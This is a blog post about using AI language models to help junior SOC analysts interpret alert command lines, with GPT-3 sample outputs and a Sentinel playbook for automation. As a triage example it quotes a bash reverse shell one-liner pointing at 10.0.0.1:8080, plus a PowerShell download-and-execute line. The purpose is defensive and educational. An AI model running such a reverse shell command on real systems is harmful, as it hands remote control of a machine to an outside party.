Mastodon

Empowering Junior Analysts with AI Language Models

May 2023
Curtis Middlehurst - Click to Follow!

A Security Operations Centre will naturally contain analysts with different experience levels and different exposure to incidents. For a lot of Cyber Security professionals, a SOC Analyst role is their first in the industry, however, the role requires the analyst to discern information from logs, some of which a junior analyst may not have seen before.

Training & Exposure

No matter how much a junior analyst is trained on tools and concepts before hitting the live queue, they will need exposure to many real alerts and logs before being truly effective and able to handle alerts on their own.

Junior analysts can be mentored by more experienced analysts to help provide context to logs and assist in triage until they have gained exposure to alerts and customer environments.

Mentoring in a live SOC

It is important to mentor junior analysts and allow them to shadow the work other analysts do, however, the reality of a live SOC means that the resource and time for training juniors is not always available.

SOC Analyst work is usually shift based and involves night shifts, this means that when someone gains experience as a security professional they may look elsewhere for a role with more sociable hours, leaving the SOC with an overall less experienced team as time goes on, with roles being filled by beginners.

Experienced shift analysts that stay in the SOC are your heavy hitters, they are relied upon to take care of the queue. This role is already demanding, so adding on the pressure of needing to work their own alerts and supervise the work of juniors can lead to burnout.

Senior analysts will be among the most experienced on the team, however, many senior analyst positions are not shift based and only provide out-of-hours support for critical incidents. Also, senior analysts may not be working the alert queue as they are needed for critical incidents, threat hunting and other project work. This means that the senior analysts aren’t available all the time to provide triage assistance and ease the task of training the juniors.

Bridging the Gap with AI Language Models

With recent innovations in the usage of AI language models to assist in everyday tasks, there is an opportunity to empower junior analysts with AI assistance to reduce the reliance on experienced analysts for help.

AI language models can provide answers to the more objective questions a junior analyst may have.

Let’s look at the following commandline, bash -i >& /dev/tcp/10.0.0.1/8080 0>&1, experienced analysts will be able to identify this as a reverse shell. But what if the person working the alert doesn’t have the experience to know what they are seeing?

We can use a prompt such as ‘Can you tell me what this commandline does, <commandline>’. This will provide an objective answer that the analyst can then use to inform their triage.

Examples:

The following examples have been created with OpenAI’s GPT-3 (text-davinci-003) language model.

Input: (Reverse Shell One-Liner from PentestMonkey): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Output: “This commandline is used to open a reverse shell connection from the local machine to a remote machine at 10.0.0.1 on port 8080. It allows the remote machine to execute commands on the local machine.”

Input: (Chocolatey install command, a common detection for PowerShell downloading analytics): Invoke Expression ((New-Object System.Net.WebClient).  DownloadString ('https://chocolatey.org/install.ps1'))

Output: “This commandline will download and execute the installation script for Chocolatey, a package manager for Windows. It will install Chocolatey on the computer and configure it for use.”

Input: "sudo apt autoremove -–purge"

Output: “This commandline is used to remove packages that were automatically installed to satisfy dependencies for other packages and are no longer needed. The \"sudo\" command allows the user to run the command with administrative privileges, the \"apt\" command is used to manage packages, the \"autoremove\" command removes packages that were automatically installed to satisfy dependencies for other packages and are no longer needed, and the \"--purge\" flag removes not only the package itself, but also any configuration files associated with it."

Turning this into a playbook for Microsoft Sentinel

SOAR solutions can be used to make API requests to third-party services with information from alerts.

This can be achieved by sending a http web request to the OpenAI API.

Since Microsoft has partnered with OpenAI, we have OpenAI connectors for logic apps that put this API request into a nice easy to configure format, I would recommend using this method to avoid requests failing due to accidentally escaping text etc.

I created a ready-made Microsoft Sentinel playbook that uses the OpenAI connector to send this request. It is available to deploy for free from Microsoft’s ‘Azure-Sentinel' GitHub repo.

Protecting Customer Data

It’s hard to believe, but some customers don’t want you to send off their data from security events to an AI language model for analysis. I personally wouldn’t recommend putting a playbook that queries public AI tools into an automation rule unless you are sure that nothing sensitive is going to come through. 

This is quite hard to determine in a production environment, however that’s where the SOC analyst can put some of that good old human analysis work in to determine if this information is suitable to be sent off before manually running the playbook (which is most cases is just a click or two away from the alert screen).

Private instances such as Azure OpenAI will likely provide a way to use customer data in a secure and compliant way. For now Azure OpenAI is only available via application form.

Summary

AI language models are tools, not a replacement for junior analysts. Without juniors we won’t have senior analysts in the future. Any tool no matter how advanced needs to be used alongside people, who have the instincts and the ability to pickup patterns where AI language models would struggle to.